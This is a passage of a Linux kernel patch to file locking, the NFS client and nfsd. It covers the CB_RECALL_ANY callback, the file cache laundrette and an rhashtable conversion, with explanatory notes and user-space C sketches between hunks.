+ 	struct file_lock_context *ctx;
+ 
+-	ctx = smp_load_acquire(&locks_inode(filp)->i_flctx);
++	ctx = locks_inode_context(locks_inode(filp));
+ 	if (!ctx)
+ 		return;
+ 
+@@ -2682,7 +2682,7 @@ bool vfs_inode_has_locks(struct inode *inode)
+ 	struct file_lock_context *ctx;
+ 	bool ret;
+ 
+-	ctx = smp_load_acquire(&inode->i_flctx);
++	ctx = locks_inode_context(inode);
+ 	if (!ctx)
+ 		return false;
+ 
+@@ -2863,7 +2863,7 @@ void show_fd_locks(struct seq_file *f,
+ 	struct file_lock_context *ctx;
+ 	int id = 0;
+ 
+-	ctx = smp_load_acquire(&inode->i_flctx);
++	ctx = locks_inode_context(inode);
+ 	if (!ctx)
+ 		return;
+ 
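
All of the fs/locks.c hunks funnel the open-coded
smp_load_acquire(&inode->i_flctx) reads through one accessor,
locks_inode_context(), so every reader pairs with the cmpxchg() that publishes
a freshly initialized context. A C11 user-space sketch of the same
publish/consume protocol, with illustrative types:

#include <stdatomic.h>
#include <stdlib.h>

struct flctx { int dummy; /* lock lists elided */ };
struct inode { _Atomic(struct flctx *) i_flctx; };

/* One accessor, acquire semantics: never see a half-built context. */
static inline struct flctx *locks_inode_context(struct inode *inode)
{
	return atomic_load_explicit(&inode->i_flctx, memory_order_acquire);
}

static struct flctx *get_or_create(struct inode *inode)
{
	struct flctx *ctx = locks_inode_context(inode);
	struct flctx *expected = NULL;

	if (ctx)
		return ctx;
	ctx = calloc(1, sizeof(*ctx));
	if (!ctx)
		return NULL;
	/* Publish with release; if we lose the race, adopt the winner's. */
	if (!atomic_compare_exchange_strong_explicit(&inode->i_flctx,
			&expected, ctx, memory_order_release,
			memory_order_acquire)) {
		free(ctx);
		ctx = expected;
	}
	return ctx;
}
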
+diff --git a/fs/nfs/nfs4trace.h b/fs/nfs/nfs4trace.h
+index 3fa77ad7258f2..c8a57cfde64b4 100644
+--- a/fs/nfs/nfs4trace.h
++++ b/fs/nfs/nfs4trace.h
+@@ -9,10 +9,10 @@
+ #define _TRACE_NFS4_H
+ 
+ #include <linux/tracepoint.h>
+-#include <trace/events/sunrpc_base.h>
++#include <trace/misc/sunrpc.h>
+ 
+-#include <trace/events/fs.h>
+-#include <trace/events/nfs.h>
++#include <trace/misc/fs.h>
++#include <trace/misc/nfs.h>
+ 
+ #define show_nfs_fattr_flags(valid) \
+ 	__print_flags((unsigned long)valid, "|", \
+diff --git a/fs/nfs/nfstrace.h b/fs/nfs/nfstrace.h
+index 8c6cc58679ff8..642f6921852fa 100644
+--- a/fs/nfs/nfstrace.h
++++ b/fs/nfs/nfstrace.h
+@@ -11,9 +11,9 @@
+ #include <linux/tracepoint.h>
+ #include <linux/iversion.h>
+ 
+-#include <trace/events/fs.h>
+-#include <trace/events/nfs.h>
+-#include <trace/events/sunrpc_base.h>
++#include <trace/misc/fs.h>
++#include <trace/misc/nfs.h>
++#include <trace/misc/sunrpc.h>
+ 
+ #define nfs_show_cache_validity(v) \
+ 	__print_flags(v, "|", \
+diff --git a/fs/nfs/write.c b/fs/nfs/write.c
+index f41d24b54fd1f..6a06066684172 100644
+--- a/fs/nfs/write.c
++++ b/fs/nfs/write.c
+@@ -667,8 +667,10 @@ static int nfs_writepage_locked(struct page *page,
+ 	int err;
+ 
+ 	if (wbc->sync_mode == WB_SYNC_NONE &&
+-	    NFS_SERVER(inode)->write_congested)
++	    NFS_SERVER(inode)->write_congested) {
++		redirty_page_for_writepage(wbc, page);
+ 		return AOP_WRITEPAGE_ACTIVATE;
++	}
+ 
+ 	nfs_inc_stats(inode, NFSIOS_VFSWRITEPAGE);
+ 	nfs_pageio_init_write(&pgio, inode, 0,
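
Returning AOP_WRITEPAGE_ACTIVATE from ->writepage means "not writing this one
now", but by that point writeback has already cleared the page's dirty bit;
without the added redirty_page_for_writepage() the skipped page would look
clean forever and its data would never reach the server. The invariant,
sketched with hypothetical page helpers:

enum { WRITEPAGE_ACTIVATE = 1 };

struct page_s {
	int dirty;
};

extern int server_congested(void);
extern void set_page_dirty(struct page_s *p);
extern int do_write(struct page_s *p);

static int writepage(struct page_s *p, int background)
{
	if (background && server_congested()) {
		set_page_dirty(p);	/* the fix: keep the write pending */
		return WRITEPAGE_ACTIVATE;
	}
	return do_write(p);
}
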
+diff --git a/fs/nfsd/Kconfig b/fs/nfsd/Kconfig
+index f6a2fd3015e75..7c441f2bd4440 100644
+--- a/fs/nfsd/Kconfig
++++ b/fs/nfsd/Kconfig
+@@ -8,6 +8,7 @@ config NFSD
+ 	select SUNRPC
+ 	select EXPORTFS
+ 	select NFS_ACL_SUPPORT if NFSD_V2_ACL
++	select NFS_ACL_SUPPORT if NFSD_V3_ACL
+ 	depends on MULTIUSER
+ 	help
+ 	  Choose Y here if you want to allow other computers to access
+@@ -26,19 +27,29 @@ config NFSD
+ 
+ 	  Below you can choose which versions of the NFS protocol are
+ 	  available to clients mounting the NFS server on this system.
+-	  Support for NFS version 2 (RFC 1094) is always available when
++	  Support for NFS version 3 (RFC 1813) is always available when
+ 	  CONFIG_NFSD is selected.
+ 
+ 	  If unsure, say N.
+ 
+-config NFSD_V2_ACL
+-	bool
++config NFSD_V2
++	bool "NFS server support for NFS version 2 (DEPRECATED)"
+ 	depends on NFSD
++	default n
++	help
++	  NFSv2 (RFC 1094) was the first publicly-released version of NFS.
++	  Unless you are hosting ancient (1990's era) NFS clients, you don't
++	  need this.
++
++	  If unsure, say N.
++
++config NFSD_V2_ACL
++	bool "NFS server support for the NFSv2 ACL protocol extension"
++	depends on NFSD_V2
+ 
+ config NFSD_V3_ACL
+ 	bool "NFS server support for the NFSv3 ACL protocol extension"
+ 	depends on NFSD
+-	select NFSD_V2_ACL
+ 	help
+ 	  Solaris NFS servers support an auxiliary NFSv3 ACL protocol that
+ 	  never became an official part of the NFS version 3 protocol.
+diff --git a/fs/nfsd/Makefile b/fs/nfsd/Makefile
+index 805c06d5f1b4b..6fffc8f03f740 100644
+--- a/fs/nfsd/Makefile
++++ b/fs/nfsd/Makefile
+@@ -10,9 +10,10 @@ obj-$(CONFIG_NFSD)	+= nfsd.o
+ # this one should be compiled first, as the tracing macros can easily blow up
+ nfsd-y			+= trace.o
+ 
+-nfsd-y 			+= nfssvc.o nfsctl.o nfsproc.o nfsfh.o vfs.o \
+-			   export.o auth.o lockd.o nfscache.o nfsxdr.o \
++nfsd-y 			+= nfssvc.o nfsctl.o nfsfh.o vfs.o \
++			   export.o auth.o lockd.o nfscache.o \
+ 			   stats.o filecache.o nfs3proc.o nfs3xdr.o
++nfsd-$(CONFIG_NFSD_V2) += nfsproc.o nfsxdr.o
+ nfsd-$(CONFIG_NFSD_V2_ACL) += nfs2acl.o
+ nfsd-$(CONFIG_NFSD_V3_ACL) += nfs3acl.o
+ nfsd-$(CONFIG_NFSD_V4)	+= nfs4proc.o nfs4xdr.o nfs4state.o nfs4idmap.o \
+diff --git a/fs/nfsd/blocklayout.c b/fs/nfsd/blocklayout.c
+index e7e6e78d965db..01d7fd108cf3d 100644
+--- a/fs/nfsd/blocklayout.c
++++ b/fs/nfsd/blocklayout.c
+@@ -12,6 +12,7 @@
+ #include "blocklayoutxdr.h"
+ #include "pnfs.h"
+ #include "filecache.h"
++#include "vfs.h"
+ 
+ #define NFSDDBG_FACILITY	NFSDDBG_PNFS
+ 
+diff --git a/fs/nfsd/blocklayoutxdr.c b/fs/nfsd/blocklayoutxdr.c
+index 2455dc8be18a8..1ed2f691ebb90 100644
+--- a/fs/nfsd/blocklayoutxdr.c
++++ b/fs/nfsd/blocklayoutxdr.c
+@@ -9,6 +9,7 @@
+ 
+ #include "nfsd.h"
+ #include "blocklayoutxdr.h"
++#include "vfs.h"
+ 
+ #define NFSDDBG_FACILITY	NFSDDBG_PNFS
+ 
+diff --git a/fs/nfsd/export.h b/fs/nfsd/export.h
+index ee0e3aba4a6e5..d03f7f6a8642d 100644
+--- a/fs/nfsd/export.h
++++ b/fs/nfsd/export.h
+@@ -115,7 +115,6 @@ struct svc_export *	rqst_find_fsidzero_export(struct svc_rqst *);
+ int			exp_rootfh(struct net *, struct auth_domain *,
+ 					char *path, struct knfsd_fh *, int maxsize);
+ __be32			exp_pseudoroot(struct svc_rqst *, struct svc_fh *);
+-__be32			nfserrno(int errno);
+ 
+ static inline void exp_put(struct svc_export *exp)
+ {
+diff --git a/fs/nfsd/filecache.c b/fs/nfsd/filecache.c
+index 5cb8cce153a57..697acf5c3c681 100644
+--- a/fs/nfsd/filecache.c
++++ b/fs/nfsd/filecache.c
+@@ -1,7 +1,32 @@
++// SPDX-License-Identifier: GPL-2.0
+ /*
+- * Open file cache.
++ * The NFSD open file cache.
+  *
+  * (c) 2015 - Jeff Layton <jeff.layton@primarydata.com>
++ *
++ * An nfsd_file object is a per-file collection of open state that binds
++ * together:
++ *   - a struct file *
++ *   - a user credential
++ *   - a network namespace
++ *   - a read-ahead context
++ *   - monitoring for writeback errors
++ *
++ * nfsd_file objects are reference-counted. Consumers acquire a new
++ * object via the nfsd_file_acquire API. They manage their interest in
++ * the acquired object, and hence the object's reference count, via
++ * nfsd_file_get and nfsd_file_put. There are two varieties of nfsd_file
++ * object:
++ *
++ *  * non-garbage-collected: When a consumer wants to precisely control
++ *    the lifetime of a file's open state, it acquires a non-garbage-
++ *    collected nfsd_file. The final nfsd_file_put releases the open
++ *    state immediately.
++ *
++ *  * garbage-collected: When a consumer does not control the lifetime
++ *    of open state, it acquires a garbage-collected nfsd_file. The
++ *    final nfsd_file_put allows the open state to linger for a period
++ *    during which it may be re-used.
+  */
+ 
+ #include <linux/hash.h>
+@@ -186,12 +211,9 @@ static const struct rhashtable_params nfsd_file_rhash_params = {
+ static void
+ nfsd_file_schedule_laundrette(void)
+ {
+-	if ((atomic_read(&nfsd_file_rhash_tbl.nelems) == 0) ||
+-	    test_bit(NFSD_FILE_CACHE_UP, &nfsd_file_flags) == 0)
+-		return;
+-
+-	queue_delayed_work(system_wq, &nfsd_filecache_laundrette,
+-			NFSD_LAUNDRETTE_DELAY);
++	if (test_bit(NFSD_FILE_CACHE_UP, &nfsd_file_flags))
++		queue_delayed_work(system_wq, &nfsd_filecache_laundrette,
++				   NFSD_LAUNDRETTE_DELAY);
+ }
+ 
+ static void
+@@ -589,7 +611,8 @@ static void
+ nfsd_file_gc_worker(struct work_struct *work)
+ {
+ 	nfsd_file_gc();
+-	nfsd_file_schedule_laundrette();
++	if (list_lru_count(&nfsd_file_lru))
++		nfsd_file_schedule_laundrette();
+ }
+ 
+ static unsigned long
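
The filecache hunks simplify when the "laundrette" (the deferred garbage
collector) re-arms itself: scheduling no longer second-guesses the hash
table's element count, and the worker requeues only while the LRU still holds
entries, so an idle cache generates no periodic wakeups. The policy in
miniature, assuming a hypothetical delayed-work API:

#include <stdbool.h>

extern unsigned long lru_count(void);
extern bool cache_is_up(void);
extern void queue_delayed(void (*fn)(void), unsigned long delay_ms);

#define GC_DELAY_MS 2000

static void gc_worker(void);

static void schedule_gc(void)
{
	if (cache_is_up())
		queue_delayed(gc_worker, GC_DELAY_MS);
}

static void gc_worker(void)
{
	/* ... dispose of expired LRU entries ... */
	if (lru_count())
		schedule_gc();	/* re-arm only while there is work */
}
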
+diff --git a/fs/nfsd/flexfilelayout.c b/fs/nfsd/flexfilelayout.c
+index 070f90ed09b61..3ca5304440ff0 100644
+--- a/fs/nfsd/flexfilelayout.c
++++ b/fs/nfsd/flexfilelayout.c
+@@ -15,6 +15,7 @@
+ 
+ #include "flexfilelayoutxdr.h"
+ #include "pnfs.h"
++#include "vfs.h"
+ 
+ #define NFSDDBG_FACILITY	NFSDDBG_PNFS
+ 
+diff --git a/fs/nfsd/netns.h b/fs/nfsd/netns.h
+index 8c854ba3285bb..51a4b7885cae2 100644
+--- a/fs/nfsd/netns.h
++++ b/fs/nfsd/netns.h
+@@ -195,7 +195,7 @@ struct nfsd_net {
+ 
+ 	atomic_t		nfsd_courtesy_clients;
+ 	struct shrinker		nfsd_client_shrinker;
+-	struct delayed_work	nfsd_shrinker_work;
++	struct work_struct	nfsd_shrinker_work;
+ };
+ 
+ /* Simple check to find out if a given net was properly initialized */
+diff --git a/fs/nfsd/nfs4callback.c b/fs/nfsd/nfs4callback.c
+index 39989c14c8a1e..4eae2c5af2edf 100644
+--- a/fs/nfsd/nfs4callback.c
++++ b/fs/nfsd/nfs4callback.c
+@@ -76,6 +76,17 @@ static __be32 *xdr_encode_empty_array(__be32 *p)
+  * 1 Protocol"
+  */
+ 
++static void encode_uint32(struct xdr_stream *xdr, u32 n)
++{
++	WARN_ON_ONCE(xdr_stream_encode_u32(xdr, n) < 0);
++}
++
++static void encode_bitmap4(struct xdr_stream *xdr, const __u32 *bitmap,
++			   size_t len)
++{
++	WARN_ON_ONCE(xdr_stream_encode_uint32_array(xdr, bitmap, len) < 0);
++}
++
+ /*
+  *	nfs_cb_opnum4
+  *
+@@ -328,6 +339,24 @@ static void encode_cb_recall4args(struct xdr_stream *xdr,
+ 	hdr->nops++;
+ }
+ 
++/*
++ * CB_RECALLANY4args
++ *
++ *	struct CB_RECALLANY4args {
++ *		uint32_t	craa_objects_to_keep;
++ *		bitmap4		craa_type_mask;
++ *	};
++ */
++static void
++encode_cb_recallany4args(struct xdr_stream *xdr,
++	struct nfs4_cb_compound_hdr *hdr, struct nfsd4_cb_recall_any *ra)
++{
++	encode_nfs_cb_opnum4(xdr, OP_CB_RECALL_ANY);
++	encode_uint32(xdr, ra->ra_keep);
++	encode_bitmap4(xdr, ra->ra_bmval, ARRAY_SIZE(ra->ra_bmval));
++	hdr->nops++;
++}
++
+ /*
+  * CB_SEQUENCE4args
+  *
+@@ -482,6 +511,26 @@ static void nfs4_xdr_enc_cb_recall(struct rpc_rqst *req, struct xdr_stream *xdr,
+ 	encode_cb_nops(&hdr);
+ }
+ 
++/*
++ * 20.6. Operation 8: CB_RECALL_ANY - Keep Any N Recallable Objects
++ */
++static void
++nfs4_xdr_enc_cb_recall_any(struct rpc_rqst *req,
++		struct xdr_stream *xdr, const void *data)
++{
++	const struct nfsd4_callback *cb = data;
++	struct nfsd4_cb_recall_any *ra;
++	struct nfs4_cb_compound_hdr hdr = {
++		.ident = cb->cb_clp->cl_cb_ident,
++		.minorversion = cb->cb_clp->cl_minorversion,
++	};
++
++	ra = container_of(cb, struct nfsd4_cb_recall_any, ra_cb);
++	encode_cb_compound4args(xdr, &hdr);
++	encode_cb_sequence4args(xdr, cb, &hdr);
++	encode_cb_recallany4args(xdr, &hdr, ra);
++	encode_cb_nops(&hdr);
++}
+ 
+ /*
+  * NFSv4.0 and NFSv4.1 XDR decode functions
+@@ -520,6 +569,28 @@ static int nfs4_xdr_dec_cb_recall(struct rpc_rqst *rqstp,
+ 	return decode_cb_op_status(xdr, OP_CB_RECALL, &cb->cb_status);
+ }
+ 
++/*
++ * 20.6. Operation 8: CB_RECALL_ANY - Keep Any N Recallable Objects
++ */
++static int
++nfs4_xdr_dec_cb_recall_any(struct rpc_rqst *rqstp,
++				  struct xdr_stream *xdr,
++				  void *data)
++{
++	struct nfsd4_callback *cb = data;
++	struct nfs4_cb_compound_hdr hdr;
++	int status;
++
++	status = decode_cb_compound4res(xdr, &hdr);
++	if (unlikely(status))
++		return status;
++	status = decode_cb_sequence4res(xdr, cb);
++	if (unlikely(status || cb->cb_seq_status))
++		return status;
++	status = decode_cb_op_status(xdr, OP_CB_RECALL_ANY, &cb->cb_status);
++	return status;
++}
++
+ #ifdef CONFIG_NFSD_PNFS
+ /*
+  * CB_LAYOUTRECALL4args
+@@ -783,6 +854,7 @@ static const struct rpc_procinfo nfs4_cb_procedures[] = {
+ #endif
+ 	PROC(CB_NOTIFY_LOCK,	COMPOUND,	cb_notify_lock,	cb_notify_lock),
+ 	PROC(CB_OFFLOAD,	COMPOUND,	cb_offload,	cb_offload),
++	PROC(CB_RECALL_ANY,	COMPOUND,	cb_recall_any,	cb_recall_any),
+ };
+ 
+ static unsigned int nfs4_cb_counts[ARRAY_SIZE(nfs4_cb_procedures)];
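
CB_RECALLANY4args is small on the wire: after the opcode word, one uint32 for
craa_objects_to_keep followed by a bitmap4, which XDR represents as a uint32
word count and then that many uint32 words, all big-endian. A freestanding
sketch of the argument encoding that encode_cb_recallany4args() delegates to
the xdr_stream helpers (buffer bounds elided):

#include <arpa/inet.h>
#include <stddef.h>
#include <stdint.h>

static uint32_t *xdr_u32(uint32_t *p, uint32_t v)
{
	*p++ = htonl(v);
	return p;
}

static uint32_t *encode_recall_any_args(uint32_t *p, uint32_t keep,
					const uint32_t *bmval, size_t len)
{
	p = xdr_u32(p, keep);			/* craa_objects_to_keep */
	p = xdr_u32(p, (uint32_t)len);		/* bitmap4 word count */
	for (size_t i = 0; i < len; i++)
		p = xdr_u32(p, bmval[i]);	/* craa_type_mask words */
	return p;
}
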
+diff --git a/fs/nfsd/nfs4idmap.c b/fs/nfsd/nfs4idmap.c
+index e70a1a2999b7b..5e9809aff37eb 100644
+--- a/fs/nfsd/nfs4idmap.c
++++ b/fs/nfsd/nfs4idmap.c
+@@ -41,6 +41,7 @@
+ #include "idmap.h"
+ #include "nfsd.h"
+ #include "netns.h"
++#include "vfs.h"
+ 
+ /*
+  * Turn off idmapping when using AUTH_SYS.
+diff --git a/fs/nfsd/nfs4proc.c b/fs/nfsd/nfs4proc.c
+index a9105e95b59c5..ba53cd89ec62c 100644
+--- a/fs/nfsd/nfs4proc.c
++++ b/fs/nfsd/nfs4proc.c
+@@ -943,12 +943,7 @@ nfsd4_read(struct svc_rqst *rqstp, struct nfsd4_compound_state *cstate,
+ 	status = nfs4_preprocess_stateid_op(rqstp, cstate, &cstate->current_fh,
+ 					&read->rd_stateid, RD_STATE,
+ 					&read->rd_nf, NULL);
+-	if (status) {
+-		dprintk("NFSD: nfsd4_read: couldn't process stateid!\n");
+-		goto out;
+-	}
+-	status = nfs_ok;
+-out:
++
+ 	read->rd_rqstp = rqstp;
+ 	read->rd_fhp = &cstate->current_fh;
+ 	return status;
+@@ -1117,10 +1112,8 @@ nfsd4_setattr(struct svc_rqst *rqstp, struct nfsd4_compound_state *cstate,
+ 		status = nfs4_preprocess_stateid_op(rqstp, cstate,
+ 				&cstate->current_fh, &setattr->sa_stateid,
+ 				WR_STATE, NULL, NULL);
+-		if (status) {
+-			dprintk("NFSD: nfsd4_setattr: couldn't process stateid!\n");
++		if (status)
+ 			return status;
+-		}
+ 	}
+ 	err = fh_want_write(&cstate->current_fh);
+ 	if (err)
+@@ -1170,10 +1163,8 @@ nfsd4_write(struct svc_rqst *rqstp, struct nfsd4_compound_state *cstate,
+ 			       write->wr_offset, cnt);
+ 	status = nfs4_preprocess_stateid_op(rqstp, cstate, &cstate->current_fh,
+ 						stateid, WR_STATE, &nf, NULL);
+-	if (status) {
+-		dprintk("NFSD: nfsd4_write: couldn't process stateid!\n");
++	if (status)
+ 		return status;
+-	}
+ 
+ 	write->wr_how_written = write->wr_stable_how;
+ 
+@@ -1204,17 +1195,13 @@ nfsd4_verify_copy(struct svc_rqst *rqstp, struct nfsd4_compound_state *cstate,
+ 
+ 	status = nfs4_preprocess_stateid_op(rqstp, cstate, &cstate->save_fh,
+ 					    src_stateid, RD_STATE, src, NULL);
+-	if (status) {
+-		dprintk("NFSD: %s: couldn't process src stateid!\n", __func__);
++	if (status)
+ 		goto out;
+-	}
+ 
+ 	status = nfs4_preprocess_stateid_op(rqstp, cstate, &cstate->current_fh,
+ 					    dst_stateid, WR_STATE, dst, NULL);
+-	if (status) {
+-		dprintk("NFSD: %s: couldn't process dst stateid!\n", __func__);
++	if (status)
+ 		goto out_put_src;
+-	}
+ 
+ 	/* fix up for NFS-specific error code */
+ 	if (!S_ISREG(file_inode((*src)->nf_file)->i_mode) ||
+@@ -1935,10 +1922,8 @@ nfsd4_fallocate(struct svc_rqst *rqstp, struct nfsd4_compound_state *cstate,
+ 	status = nfs4_preprocess_stateid_op(rqstp, cstate, &cstate->current_fh,
+ 					    &fallocate->falloc_stateid,
+ 					    WR_STATE, &nf, NULL);
+-	if (status != nfs_ok) {
+-		dprintk("NFSD: nfsd4_fallocate: couldn't process stateid!\n");
++	if (status != nfs_ok)
+ 		return status;
+-	}
+ 
+ 	status = nfsd4_vfs_fallocate(rqstp, &cstate->current_fh, nf->nf_file,
+ 				     fallocate->falloc_offset,
+@@ -1994,10 +1979,8 @@ nfsd4_seek(struct svc_rqst *rqstp, struct nfsd4_compound_state *cstate,
+ 	status = nfs4_preprocess_stateid_op(rqstp, cstate, &cstate->current_fh,
+ 					    &seek->seek_stateid,
+ 					    RD_STATE, &nf, NULL);
+-	if (status) {
+-		dprintk("NFSD: nfsd4_seek: couldn't process stateid!\n");
++	if (status)
+ 		return status;
+-	}
+ 
+ 	switch (seek->seek_whence) {
+ 	case NFS4_CONTENT_DATA:
+diff --git a/fs/nfsd/nfs4state.c b/fs/nfsd/nfs4state.c
+index b3f6dda930d8b..b9d694ec25d19 100644
+--- a/fs/nfsd/nfs4state.c
++++ b/fs/nfsd/nfs4state.c
+@@ -44,7 +44,9 @@
+ #include <linux/jhash.h>
+ #include <linux/string_helpers.h>
+ #include <linux/fsnotify.h>
++#include <linux/rhashtable.h>
+ #include <linux/nfs_ssc.h>
++
+ #include "xdr4.h"
+ #include "xdr4cb.h"
+ #include "vfs.h"
+@@ -84,6 +86,7 @@ static bool check_for_locks(struct nfs4_file *fp, struct nfs4_lockowner *lowner)
+ static void nfs4_free_ol_stateid(struct nfs4_stid *stid);
+ void nfsd4_end_grace(struct nfsd_net *nn);
+ static void _free_cpntf_state_locked(struct nfsd_net *nn, struct nfs4_cpntf_state *cps);
++static void nfsd4_file_hash_remove(struct nfs4_file *fi);
+ 
+ /* Locking: */
+ 
+@@ -588,11 +591,8 @@ static void nfsd4_free_file_rcu(struct rcu_head *rcu)
+ void
+ put_nfs4_file(struct nfs4_file *fi)
+ {
+-	might_lock(&state_lock);
+-
+-	if (refcount_dec_and_lock(&fi->fi_ref, &state_lock)) {
+-		hlist_del_rcu(&fi->fi_hash);
+-		spin_unlock(&state_lock);
++	if (refcount_dec_and_test(&fi->fi_ref)) {
++		nfsd4_file_hash_remove(fi);
+ 		WARN_ON_ONCE(!list_empty(&fi->fi_clnt_odstate));
+ 		WARN_ON_ONCE(!list_empty(&fi->fi_delegations));
+ 		call_rcu(&fi->fi_rcu, nfsd4_free_file_rcu);
+@@ -717,19 +717,20 @@ static unsigned int ownerstr_hashval(struct xdr_netobj *ownername)
+ 	return ret & OWNER_HASH_MASK;
+ }
+ 
+-/* hash table for nfs4_file */
+-#define FILE_HASH_BITS                   8
+-#define FILE_HASH_SIZE                  (1 << FILE_HASH_BITS)
+-
+-static unsigned int file_hashval(struct svc_fh *fh)
+-{
+-	struct inode *inode = d_inode(fh->fh_dentry);
++static struct rhltable nfs4_file_rhltable ____cacheline_aligned_in_smp;
+ 
+-	/* XXX: why not (here & in file cache) use inode? */
+-	return (unsigned int)hash_long(inode->i_ino, FILE_HASH_BITS);
+-}
++static const struct rhashtable_params nfs4_file_rhash_params = {
++	.key_len		= sizeof_field(struct nfs4_file, fi_inode),
++	.key_offset		= offsetof(struct nfs4_file, fi_inode),
++	.head_offset		= offsetof(struct nfs4_file, fi_rlist),
+ 
+-static struct hlist_head file_hashtbl[FILE_HASH_SIZE];
++	/*
++	 * Start with a single page hash table to reduce resizing churn
++	 * on light workloads.
++	 */
++	.min_size		= 256,
++	.automatic_shrinking	= true,
++};
+ 
+ /*
+  * Check if courtesy clients have conflicting access and resolve it if possible
+@@ -1367,6 +1368,8 @@ static void revoke_delegation(struct nfs4_delegation *dp)
+ 
+ 	WARN_ON(!list_empty(&dp->dl_recall_lru));
+ 
++	trace_nfsd_stid_revoke(&dp->dl_stid);
++
+ 	if (clp->cl_minorversion) {
+ 		spin_lock(&clp->cl_lock);
+ 		dp->dl_stid.sc_type = NFS4_REVOKED_DELEG_STID;
+@@ -1831,13 +1834,12 @@ static struct nfsd4_session *alloc_session(struct nfsd4_channel_attrs *fattrs,
+ 	int numslots = fattrs->maxreqs;
+ 	int slotsize = slot_bytes(fattrs);
+ 	struct nfsd4_session *new;
+-	int mem, i;
++	int i;
+ 
+-	BUILD_BUG_ON(NFSD_MAX_SLOTS_PER_SESSION * sizeof(struct nfsd4_slot *)
+-			+ sizeof(struct nfsd4_session) > PAGE_SIZE);
+-	mem = numslots * sizeof(struct nfsd4_slot *);
++	BUILD_BUG_ON(struct_size(new, se_slots, NFSD_MAX_SLOTS_PER_SESSION)
++		     > PAGE_SIZE);
+ 
+-	new = kzalloc(sizeof(*new) + mem, GFP_KERNEL);
++	new = kzalloc(struct_size(new, se_slots, numslots), GFP_KERNEL);
+ 	if (!new)
+ 		return NULL;
+ 	/* allocate each struct nfsd4_slot and data cache in one piece */
+@@ -2143,6 +2145,7 @@ static void __free_client(struct kref *k)
+ 	kfree(clp->cl_nii_domain.data);
+ 	kfree(clp->cl_nii_name.data);
+ 	idr_destroy(&clp->cl_stateids);
++	kfree(clp->cl_ra);
+ 	kmem_cache_free(client_slab, clp);
+ }
+ 
+@@ -2870,6 +2873,37 @@ static const struct tree_descr client_files[] = {
+ 	[3] = {""},
+ };
+ 
++static int
++nfsd4_cb_recall_any_done(struct nfsd4_callback *cb,
++				struct rpc_task *task)
++{
++	trace_nfsd_cb_recall_any_done(cb, task);
++	switch (task->tk_status) {
++	case -NFS4ERR_DELAY:
++		rpc_delay(task, 2 * HZ);
++		return 0;
++	default:
++		return 1;
++	}
++}
++
++static void
++nfsd4_cb_recall_any_release(struct nfsd4_callback *cb)
++{
++	struct nfs4_client *clp = cb->cb_clp;
++	struct nfsd_net *nn = net_generic(clp->net, nfsd_net_id);
++
++	spin_lock(&nn->client_lock);
++	clear_bit(NFSD4_CLIENT_CB_RECALL_ANY, &clp->cl_flags);
++	put_client_renew_locked(clp);
++	spin_unlock(&nn->client_lock);
++}
++
++static const struct nfsd4_callback_ops nfsd4_cb_recall_any_ops = {
++	.done		= nfsd4_cb_recall_any_done,
++	.release	= nfsd4_cb_recall_any_release,
++};
++
+ static struct nfs4_client *create_client(struct xdr_netobj name,
+ 		struct svc_rqst *rqstp, nfs4_verifier *verf)
+ {
+@@ -2907,6 +2941,14 @@ static struct nfs4_client *create_client(struct xdr_netobj name,
+ 		free_client(clp);
+ 		return NULL;
+ 	}
++	clp->cl_ra = kzalloc(sizeof(*clp->cl_ra), GFP_KERNEL);
++	if (!clp->cl_ra) {
++		free_client(clp);
++		return NULL;
++	}
++	clp->cl_ra_time = 0;
++	nfsd4_init_cb(&clp->cl_ra->ra_cb, clp, &nfsd4_cb_recall_any_ops,
++			NFSPROC4_CLNT_CB_RECALL_ANY);
+ 	return clp;
+ }
+ 
+@@ -4276,11 +4318,9 @@ static struct nfs4_file *nfsd4_alloc_file(void)
+ }
+ 
+ /* OPEN Share state helper functions */
+-static void nfsd4_init_file(struct svc_fh *fh, unsigned int hashval,
+-				struct nfs4_file *fp)
+-{
+-	lockdep_assert_held(&state_lock);
+ 
++static void nfsd4_file_init(const struct svc_fh *fh, struct nfs4_file *fp)
++{
+ 	refcount_set(&fp->fi_ref, 1);
+ 	spin_lock_init(&fp->fi_lock);
+ 	INIT_LIST_HEAD(&fp->fi_stateids);
+@@ -4298,7 +4338,6 @@ static void nfsd4_init_file(struct svc_fh *fh, unsigned int hashval,
+ 	INIT_LIST_HEAD(&fp->fi_lo_states);
+ 	atomic_set(&fp->fi_lo_recalls, 0);
+ #endif
+-	hlist_add_head_rcu(&fp->fi_hash, &file_hashtbl[hashval]);
+ }
+ 
+ void
+@@ -4363,25 +4402,27 @@ nfsd4_init_slabs(void)
+ }
+ 
+ static unsigned long
+-nfsd_courtesy_client_count(struct shrinker *shrink, struct shrink_control *sc)
++nfsd4_state_shrinker_count(struct shrinker *shrink, struct shrink_control *sc)
+ {
+-	int cnt;
++	int count;
+ 	struct nfsd_net *nn = container_of(shrink,
+ 			struct nfsd_net, nfsd_client_shrinker);
+ 
+-	cnt = atomic_read(&nn->nfsd_courtesy_clients);
+-	if (cnt > 0)
+-		mod_delayed_work(laundry_wq, &nn->nfsd_shrinker_work, 0);
+-	return (unsigned long)cnt;
++	count = atomic_read(&nn->nfsd_courtesy_clients);
++	if (!count)
++		count = atomic_long_read(&num_delegations);
++	if (count)
++		queue_work(laundry_wq, &nn->nfsd_shrinker_work);
++	return (unsigned long)count;
+ }
+ 
+ static unsigned long
+-nfsd_courtesy_client_scan(struct shrinker *shrink, struct shrink_control *sc)
++nfsd4_state_shrinker_scan(struct shrinker *shrink, struct shrink_control *sc)
+ {
+ 	return SHRINK_STOP;
+ }
+ 
+-int
++void
+ nfsd4_init_leases_net(struct nfsd_net *nn)
+ {
+ 	struct sysinfo si;
+@@ -4403,16 +4444,6 @@ nfsd4_init_leases_net(struct nfsd_net *nn)
+ 	nn->nfs4_max_clients = max_t(int, max_clients, NFS4_CLIENTS_PER_GB);
+ 
+ 	atomic_set(&nn->nfsd_courtesy_clients, 0);
+-	nn->nfsd_client_shrinker.scan_objects = nfsd_courtesy_client_scan;
+-	nn->nfsd_client_shrinker.count_objects = nfsd_courtesy_client_count;
+-	nn->nfsd_client_shrinker.seeks = DEFAULT_SEEKS;
+-	return register_shrinker(&nn->nfsd_client_shrinker, "nfsd-client");
+-}
+-
+-void
+-nfsd4_leases_net_shutdown(struct nfsd_net *nn)
+-{
+-	unregister_shrinker(&nn->nfsd_client_shrinker);
+ }
+ 
+ static void init_nfs4_replay(struct nfs4_replay *rp)
+@@ -4683,71 +4714,80 @@ move_to_close_lru(struct nfs4_ol_stateid *s, struct net *net)
+ 		nfs4_put_stid(&last->st_stid);
+ }
+ 
+-/* search file_hashtbl[] for file */
+-static struct nfs4_file *
